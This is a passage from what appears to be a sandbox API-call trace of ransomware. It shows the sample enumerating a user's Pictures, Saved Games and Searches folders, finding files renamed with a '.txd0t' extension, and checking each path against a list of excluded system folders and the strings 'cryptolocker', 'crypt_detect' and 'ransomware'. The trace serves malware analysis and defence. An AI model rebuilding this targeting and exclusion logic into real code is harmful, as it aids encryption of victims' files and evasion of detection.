lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files") returned 0x0 [0090.277] GetProcessHeap () returned 0xe30000 [0090.277] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xec75a0 [0090.277] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0090.277] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*" [0090.278] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0090.278] StrCmpW (psz1=".", psz2=".") returned 0 [0090.278] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.278] StrCmpW (psz1="..", psz2=".") returned 1 [0090.278] StrCmpW (psz1="..", psz2="..") returned 0 [0090.278] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.278] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.278] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.278] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.278] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0090.278] GetProcessHeap () returned 0xe30000 [0090.278] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.278] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20da860, ftCreationTime.dwHighDateTime=0x1d5ee0e, ftLastAccessTime.dwLowDateTime=0xf31774b0, ftLastAccessTime.dwHighDateTime=0x1d5ed8d, ftLastWriteTime.dwLowDateTime=0x529a6958, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3a39, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="SjHlBfZqKWu.bmp.txd0t", cAlternateFileName="SJHLBF~1.TXD")) returned 1 [0090.278] StrCmpW (psz1="SjHlBfZqKWu.bmp.txd0t", psz2=".") returned 1 [0090.278] StrCmpW (psz1="SjHlBfZqKWu.bmp.txd0t", psz2="..") returned 1 [0090.278] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.278] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.278] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SjHlBfZqKWu.bmp.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t" [0090.278] PathFindExtensionW (pszPath="SjHlBfZqKWu.bmp.txd0t") returned=".txd0t" [0090.278] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.278] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708056c0, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xe96971d0, ftLastAccessTime.dwHighDateTime=0x1d5e486, ftLastWriteTime.dwLowDateTime=0x529a6958, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa0d9, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="SUlXmTX1.jpg.txd0t", cAlternateFileName="SULXMT~1.TXD")) returned 1 [0090.278] StrCmpW (psz1="SUlXmTX1.jpg.txd0t", psz2=".") returned 1 [0090.278] StrCmpW (psz1="SUlXmTX1.jpg.txd0t", psz2="..") returned 1 [0090.278] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.278] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.278] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SUlXmTX1.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t" [0090.278] PathFindExtensionW (pszPath="SUlXmTX1.jpg.txd0t") returned=".txd0t" [0090.279] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.279] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe868d20, ftCreationTime.dwHighDateTime=0x1d5e6d1, ftLastAccessTime.dwLowDateTime=0x71777220, ftLastAccessTime.dwHighDateTime=0x1d5e7e8, ftLastWriteTime.dwLowDateTime=0x529ccb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18445, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="wI6_mSLtm0QHgo.gif.txd0t", cAlternateFileName="WI6_MS~1.TXD")) returned 1 [0090.279] StrCmpW (psz1="wI6_mSLtm0QHgo.gif.txd0t", psz2=".") returned 1 [0090.279] StrCmpW (psz1="wI6_mSLtm0QHgo.gif.txd0t", psz2="..") returned 1 [0090.279] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.279] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.279] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="wI6_mSLtm0QHgo.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t" [0090.279] PathFindExtensionW (pszPath="wI6_mSLtm0QHgo.gif.txd0t") returned=".txd0t" [0090.279] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.279] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc99ffe0, ftCreationTime.dwHighDateTime=0x1d5ece6, ftLastAccessTime.dwLowDateTime=0x899e87d0, ftLastAccessTime.dwHighDateTime=0x1d5e59a, ftLastWriteTime.dwLowDateTime=0x529ccb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf9f6, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", cAlternateFileName="X7M0JV~1.TXD")) returned 1 [0090.279] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", psz2=".") returned 1 [0090.279] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", psz2="..") returned 1 [0090.279] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.279] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.279] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t" [0090.279] PathFindExtensionW (pszPath="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned=".txd0t" [0090.279] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.279] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c31360, ftCreationTime.dwHighDateTime=0x1d5eac7, ftLastAccessTime.dwLowDateTime=0x9f0a2830, ftLastAccessTime.dwHighDateTime=0x1d5ef9b, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6d2f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cAlternateFileName="XEJ8A4~1.TXD")) returned 1 [0090.279] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", psz2=".") returned 1 [0090.279] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", psz2="..") returned 1 [0090.279] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.279] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.279] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t" [0090.279] PathFindExtensionW (pszPath="Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned=".txd0t" [0090.279] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.279] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c31360, ftCreationTime.dwHighDateTime=0x1d5eac7, ftLastAccessTime.dwLowDateTime=0x9f0a2830, ftLastAccessTime.dwHighDateTime=0x1d5ef9b, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6d2f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cAlternateFileName="XEJ8A4~1.TXD")) returned 0 [0090.279] FindClose (in: hFindFile=0xec2670 | out: hFindFile=0xec2670) returned 1 [0090.279] GetProcessHeap () returned 0xe30000 [0090.279] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedac48 | out: hHeap=0xe30000) returned 1 [0090.279] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0090.279] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0090.280] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0090.280] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0090.280] StrCmpW (psz1="Recent", psz2=".") returned 1 [0090.280] StrCmpW (psz1="Recent", psz2="..") returned 1 [0090.280] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0090.280] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0090.280] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0090.280] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.280] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.280] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Saved Games", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="ransomware") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.280] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0090.280] GetProcessHeap () returned 0xe30000 [0090.281] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xec75a0 [0090.281] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Saved Games", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0090.281] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Saved Games", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games\\*") returned="C:\\Users\\FD1HVy\\Saved Games\\*" [0090.281] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0090.281] StrCmpW (psz1=".", psz2=".") returned 0 [0090.281] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.281] StrCmpW (psz1="..", psz2=".") returned 1 [0090.281] StrCmpW (psz1="..", psz2="..") returned 0 [0090.281] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.281] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.281] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.281] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.281] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0090.281] GetProcessHeap () returned 0xe30000 [0090.281] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.281] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0090.281] StrCmpW (psz1="Searches", psz2=".") returned 1 [0090.281] StrCmpW (psz1="Searches", psz2="..") returned 1 [0090.281] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.281] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.281] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Searches", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system32\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\local\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\boot\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\perflogs\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\programdata\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\drivers\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\wsus\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="crypt_detect") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="cryptolocker") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="ransomware") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\WINDOWS") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.282] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files") returned 0x0 [0090.282] GetProcessHeap () returned 0xe30000 [0090.282] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xec75a0 [0090.282] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0090.282] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\*") returned="C:\\Users\\FD1HVy\\Searches\\*" [0090.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0090.282] StrCmpW (psz1=".", psz2=".") returned 0 [0090.282] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.283] StrCmpW (psz1="..", psz2=".") returned 1 [0090.283] StrCmpW (psz1="..", psz2="..") returned 0 [0090.283] FindNextFileW 